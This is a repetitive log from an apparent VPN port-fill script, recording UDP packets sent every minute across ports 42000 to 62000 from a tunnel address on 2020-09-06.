6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:02:05 +Starting port fill at 2020-09-06 09:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:03:06 +Starting port fill at 2020-09-06 09:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:04:06 +Starting port fill at 2020-09-06 09:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:05:06 +Starting port fill at 2020-09-06 09:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:06:04 +Starting port fill at 2020-09-06 09:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:07:04 +Starting port fill at 2020-09-06 09:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:08:07 +Starting port fill at 2020-09-06 09:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:09:06 +Starting port fill at 2020-09-06 09:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:10:05 +Starting port fill at 2020-09-06 09:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:11:05 +Starting port fill at 2020-09-06 09:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:12:06 +Starting port fill at 2020-09-06 09:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:13:06 +Starting port fill at 2020-09-06 09:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:14:06 +Starting port fill at 2020-09-06 09:15:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:15:06 +Starting port fill at 2020-09-06 09:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:16:06 +Starting port fill at 2020-09-06 09:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:17:06 +Starting port fill at 2020-09-06 09:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:18:04 +Starting port fill at 2020-09-06 09:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:19:04 +Starting port fill at 2020-09-06 09:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:20:06 +Starting port fill at 2020-09-06 09:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:21:04 +Starting port fill at 2020-09-06 09:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:22:06 +Starting port fill at 2020-09-06 09:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:23:06 +Starting port fill at 2020-09-06 09:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:24:06 +Starting port fill at 2020-09-06 09:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 09:25:07 +Starting port fill at 2020-09-06 09:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:26:05 +Starting port fill at 2020-09-06 09:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:27:05 +Starting port fill at 2020-09-06 09:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:28:06 +Starting port fill at 2020-09-06 09:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:29:05 +Starting port fill at 2020-09-06 09:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 